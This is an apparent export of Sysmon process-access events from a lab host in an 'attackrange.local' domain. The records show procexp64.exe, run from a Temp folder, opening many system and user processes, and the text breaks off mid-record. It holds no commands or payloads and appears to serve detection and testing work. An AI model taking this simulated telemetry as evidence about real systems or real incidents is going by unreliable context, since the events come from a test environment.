15:17:01.860{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-2808-600F-DC82-00000000A301}1436C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c459|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c50b|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2f56|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2b0a|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+25cd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+1617|C:\Windows\system32\mscoree.dll+1a755|C:\Windows\System32\advapi32.dll+12060|C:\Windows\System32\advapi32.dll+116b5|C:\Windows\System32\KERNELBASE.dll+23d79|C:\Windows\System32\KERNELBASE.dll+2332d|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+71d9d|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a1517|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000792347Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:17:01.860{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-2808-600F-DB82-00000000A301}7708C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+3ad5|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+40b1|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+cdf4|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c8f1|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2ed6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2772|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+1617|C:\Windows\system32\mscoree.dll+1a755|C:\Windows\System32\advapi32.dll+12060|C:\Windows\System32\advapi32.dll+116b5|C:\Windows\System32\KERNELBASE.dll+23d79|C:\Windows\System32\KERNELBASE.dll+2332d|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+71d9d|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a1517|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000792346Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:17:01.860{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-2808-600F-DB82-00000000A301}7708C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c459|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c50b|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2f56|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2b0a|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+25cd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+1617|C:\Windows\system32\mscoree.dll+1a755|C:\Windows\System32\advapi32.dll+12060|C:\Windows\System32\advapi32.dll+116b5|C:\Windows\System32\KERNELBASE.dll+23d79|C:\Windows\System32\KERNELBASE.dll+2332d|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+71d9d|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a1517|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000792345Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:17:01.860{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-2806-600F-D682-00000000A301}6624C:\Windows\explorer.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+3ad5|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+40b1|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+cdf4|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c8f1|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2ed6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2772|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+1617|C:\Windows\system32\mscoree.dll+1a755|C:\Windows\System32\advapi32.dll+12060|C:\Windows\System32\advapi32.dll+116b5|C:\Windows\System32\KERNELBASE.dll+23d79|C:\Windows\System32\KERNELBASE.dll+2332d|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+71d9d|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a1517|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000792344Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:17:01.860{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-2806-600F-D682-00000000A301}6624C:\Windows\explorer.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c459|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c50b|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2f56|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2b0a|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+25cd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+1617|C:\Windows\system32\mscoree.dll+1a755|C:\Windows\System32\advapi32.dll+12060|C:\Windows\System32\advapi32.dll+116b5|C:\Windows\System32\KERNELBASE.dll+23d79|C:\Windows\System32\KERNELBASE.dll+2332d|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+71d9d|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a1517|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000792343Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:17:01.860{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-1EBE-600B-A206-00000000A301}7468C:\Program Files\Notepad++\notepad++.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+3ad5|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+40b1|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+cdf4|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c8f1|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2ed6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2772|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+1617|C:\Windows\system32\mscoree.dll+1a755|C:\Windows\System32\advapi32.dll+12060|C:\Windows\System32\advapi32.dll+116b5|C:\Windows\System32\KERNELBASE.dll+23d79|C:\Windows\System32\KERNELBASE.dll+2332d|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+71d9d|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a1517|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000792342Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:17:01.860{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-1EBE-600B-A206-00000000A301}7468C:\Program Files\Notepad++\notepad++.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c459|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c50b|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2f56|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2b0a|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+25cd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+1617|C:\Windows\system32\mscoree.dll+1a755|C:\Windows\System32\advapi32.dll+12060|C:\Windows\System32\advapi32.dll+116b5|C:\Windows\System32\KERNELBASE.dll+23d79|C:\Windows\System32\KERNELBASE.dll+2332d|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+71d9d|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a1517|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000792341Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:17:01.860{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-1DB4-600B-1E06-00000000A301}2936C:\Program Files (x86)\Google\Update\1.3.36.52\GoogleCrashHandler64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+3ad5|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+40b1|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+cdf4|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c8f1|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2ed6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2772|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+1617|C:\Windows\system32\mscoree.dll+1a755|C:\Windows\System32\advapi32.dll+12060|C:\Windows\System32\advapi32.dll+116b5|C:\Windows\System32\KERNELBASE.dll+23d79|C:\Windows\System32\KERNELBASE.dll+2332d|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+71d9d|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a1517|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000792340Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:17:01.860{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-1DB4-600B-1E06-00000000A301}2936C:\Program Files (x86)\Google\Update\1.3.36.52\GoogleCrashHandler64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c459|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c50b|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2f56|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2b0a|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+25cd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+1617|C:\Windows\system32\mscoree.dll+1a755|C:\Windows\System32\advapi32.dll+12060|C:\Windows\System32\advapi32.dll+116b5|C:\Windows\System32\KERNELBASE.dll+23d79|C:\Windows\System32\KERNELBASE.dll+2332d|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+71d9d|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a1517|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000792339Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:17:01.860{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-1DB4-600B-1D06-00000000A301}5472C:\Program Files (x86)\Google\Update\1.3.36.52\GoogleCrashHandler.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+3ad5|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+40b1|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+cdf4|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c8f1|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2ed6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2772|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+1617|C:\Windows\system32\mscoree.dll+1a755|C:\Windows\System32\advapi32.dll+12060|C:\Windows\System32\advapi32.dll+116b5|C:\Windows\System32\KERNELBASE.dll+23d79|C:\Windows\System32\KERNELBASE.dll+2332d|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+71d9d|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a1517|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000792338Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:17:01.860{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-1DB4-600B-1D06-00000000A301}5472C:\Program Files (x86)\Google\Update\1.3.36.52\GoogleCrashHandler.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c459|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c50b|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2f56|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2b0a|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+25cd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+1617|C:\Windows\system32\mscoree.dll+1a755|C:\Windows\System32\advapi32.dll+12060|C:\Windows\System32\advapi32.dll+116b5|C:\Windows\System32\KERNELBASE.dll+23d79|C:\Windows\System32\KERNELBASE.dll+2332d|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+71d9d|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a1517|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000792337Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:17:01.860{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-1D92-600B-0806-00000000A301}4464C:\Windows\system32\fontdrvhost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+3ad5|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+40b1|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+cdf4|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c8f1|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2ed6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2772|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+1617|C:\Windows\system32\mscoree.dll+1a755|C:\Windows\System32\advapi32.dll+12060|C:\Windows\System32\advapi32.dll+116b5|C:\Windows\System32\KERNELBASE.dll+23d79|C:\Windows\System32\KERNELBASE.dll+2332d|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+71d9d|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a1517|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000792336Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:17:01.844{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-1D92-600B-0806-00000000A301}4464C:\Windows\system32\fontdrvhost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c459|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c50b|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2f56|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2b0a|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+25cd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+1617|C:\Windows\system32\mscoree.dll+1a755|C:\Windows\System32\advapi32.dll+12060|C:\Windows\System32\advapi32.dll+116b5|C:\Windows\System32\KERNELBASE.dll+23d79|C:\Windows\System32\KERNELBASE.dll+2332d|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+71d9d|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a1517|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000792335Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:17:01.844{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-1D85-600B-0706-00000000A301}7696C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+3ad5|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+40b1|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+cdf4|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c8f1|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2ed6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2772|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+1617|C:\Windows\system32\mscoree.dll+1a755|C:\Windows\System32\advapi32.dll+12060|C:\Windows\System32\advapi32.dll+116b5|C:\Windows\System32\KERNELBASE.dll+23d79|C:\Windows\System32\KERNELBASE.dll+2332d|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+71d9d|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a1517|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000792334Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:17:01.844{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-1D85-600B-0706-00000000A301}7696C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c459|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c50b|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2f56|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2b0a|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+25cd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+1617|C:\Windows\system32\mscoree.dll+1a755|C:\Windows\System32\advapi32.dll+12060|C:\Windows\System32\advapi32.dll+116b5|C:\Windows\System32\KERNELBASE.dll+23d79|C:\Windows\System32\KERNELBASE.dll+2332d|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+71d9d|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a1517|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000792333Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:17:01.844{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-1D85-600B-0606-00000000A301}4952C:\Program Files\Internet Explorer\iexplore.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+3ad5|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+40b1|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+cdf4|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c8f1|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2ed6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2772|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+1617|C:\Windows\system32\mscoree.dll+1a755|C:\Windows\System32\advapi32.dll+12060|C:\Windows\System32\advapi32.dll+116b5|C:\Windows\System32\KERNELBASE.dll+23d79|C:\Windows\System32\KERNELBASE.dll+2332d|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+71d9d|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a1517|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000792332Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:17:01.844{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-1D85-600B-0606-00000000A301}4952C:\Program Files\Internet Explorer\iexplore.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c459|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c50b|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2f56|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2b0a|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+25cd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+1617|C:\Windows\system32\mscoree.dll+1a755|C:\Windows\System32\advapi32.dll+12060|C:\Windows\System32\advapi32.dll+116b5|C:\Windows\System32\KERNELBASE.dll+23d79|C:\Windows\System32\KERNELBASE.dll+2332d|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+71d9d|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a1517|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000792331Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:17:01.844{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-17E2-600B-A401-00000000A301}5528C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+3ad5|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+40b1|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+cdf4|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c8f1|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2ed6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2772|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+1617|C:\Windows\system32\mscoree.dll+1a755|C:\Windows\System32\advapi32.dll+12060|C:\Windows\System32\advapi32.dll+116b5|C:\Windows\System32\KERNELBASE.dll+23d79|C:\Windows